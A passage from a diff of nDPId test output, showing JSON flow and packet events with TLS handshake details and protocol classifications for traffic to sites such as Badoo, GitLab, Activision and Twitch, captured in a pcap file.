/84M9BXHGtIJp6HdzCSQRE\/jjRMPOqb5+WU5M\/Rwa3rXtSAPp6MS0Mul28MptoKZ2BK0ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482623895,"flow_last_seen":1646482623895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482623895,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1646482623895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482623895,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8U5dAAEAGwa7AqAGAH95DcIjuAbuZU7+5AAAAAKAC+vB+rAAAAgQFtAQCCAqYsCyFAAAAAAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1646482623937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482623937,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADIGI04f3kNwwKgBgAG7iO5SHRbemVO\/uoASa9CRawAAAgQFUAEBBAIBAwMH"} +01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1646482623941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482623941,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItU5lAAEAGv7vAqAGAH95DcIjuAbuZU7+6Uh0W31AYAfZFAQAAFgMBAgABAAH8AwM7S+zQhzGHYgeM16HLoV5Lvv0qFp3\/Q9lLhcf6NGzgACCV4MycI1TbPUTQp0gTtBJdGxhCWPX0NxBb4Keh1UEhIQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuYmFkb28uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIDy\/wV7uHvn89KVxoNawBj6O\/1N7J\/Rv6ROuT\/L2i752ABcAQQR8rtiFUa3yYRs4u6Ro\/84M9BXHGtIJp6HdzCSQRE\/jjRMPOqb5+WU5M\/Rwa3rXtSAPp6MS0Mul28MptoKZ2BK0ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":180000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482634412,"flow_last_seen":1646482634412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482634412,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1646482634412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482634412,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ehBAAEAGVvPAqAGArEH7TtLuAburPYAuAAAAAKAC+vCVcQAAAgQFtAQCCAoaoTMuAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1646482634431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482634431,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkG2AusQftOwKgBgAG70u5kgyMxqz2AL4AS\/\/99tgAAAgQFeAEBBAIBAwMK"} -01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1646482634434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482634434,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItehJAAEAGVQDAqAGArEH7TtLuAburPYAvZIMjMlAYAfajwgAAFgMBAgABAAH8AwNOB4Gzi6+YArAvzkfwrorK9DEddM7BFl3e3mWx5EKfGSCorzDjbh21t2eWZKubSdOdkcLfUyHi+FUzEXYnC03sBQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA53d3cuZ2l0bGFiLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACA5FC8LVJQpX7CGnPMJyGCVSqmP\/UlOQqTKt4aSCzonPAAXAEEEf41WX9lKjs6LoM+3mxjeublwFG7G1\/kkw4gmsHPLzdToe\/hXlsiK3SyaMLeOC3M5q1ZNvI72xevTMYH\/wlBkVwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482646628,"flow_last_seen":1646482646628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482646628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1646482646628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8eQxAAEAGb\/bAqAGAAhGNgKZUAbv+Ru5OAAAAAKAC+vDfwAAAAgQFtAQCCAp7uQs2AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1646482646646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646646,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8QICEY2AwKgBgAG7plR0ThXR\/kbuT6AS\/oh2XAAAAgQFtAQCCAqpkTIKe7kLNgEDAwc="} -01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1646482646648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482646648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5eQ5AAEAGbffAqAGAAhGNgKZUAbv+Ru5PdE4V0oAYAfbaKAAAAQEICnu5C0qpkTIKFgMBAgABAAH8AwMSh5Kk8yD8gdWVB2YFzzg9KRBCWJ\/pzlApBrokxgf2OCBs84UpHDw4uY4jKpCVZJzZAhJUrEs0AlJ7gTtfJSwiWgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cuYWN0aXZpc2lvbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg40qefHDImQJEkibGm9hnpGwl44lKo4KOQS8qsLRSATsAFwBBBPNBVrG5A+ZLqrow1aQOaEgsW+53RcPAplpAt8ULtljoAJH8CjL7YTSZ+PIOiRhMhirRlex47cXc5PiOAFYE9T0AKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.callofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482659915,"flow_last_seen":1646482659915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482659915,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1646482659915,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659915,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NwhAAEAGcJnAqAGAkks+p7QEAbuPD+ThAAAAAKAC+vAn\/AAAAgQFtAQCCAp9leqxAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1646482659944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659944,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrqGSSz6nwKgBgAG7tAQzgGmMjw\/k4qAS\/\/\/dhgAAAgQFTAQCCAr4JbCIfZXqsQEDAwk="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1646482659945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482659945,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5NwpAAEAGbprAqAGAkks+p7QEAbuPD+TiM4BpjYAYAfarGwAAAQEICn2V6s\/4JbCIFgMBAgABAAH8AwPVHsjDDxZ0MEuPnh4mVZQrYKtXYBQ9pfekL0WuWf4AwyAvTRXY5\/1xoex7GTddskZx0XzTM0eEKSDE8zjmPz09AAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1ncWwudHdpdGNoLnR2ABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AICTuPjjZ\/cozh9y3b4u57OZ+NqRixmrA1oX4LnqMFUIxABcAQQTtWijAm0UTGHfpz\/ha9z62jseAV4wQoU798kRZvjxGrgocjEiYQtFtFEOacmIDo8c6dP4orndC+2JQqffkv\/gjACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482686914,"flow_last_seen":1646482686914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482686914,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 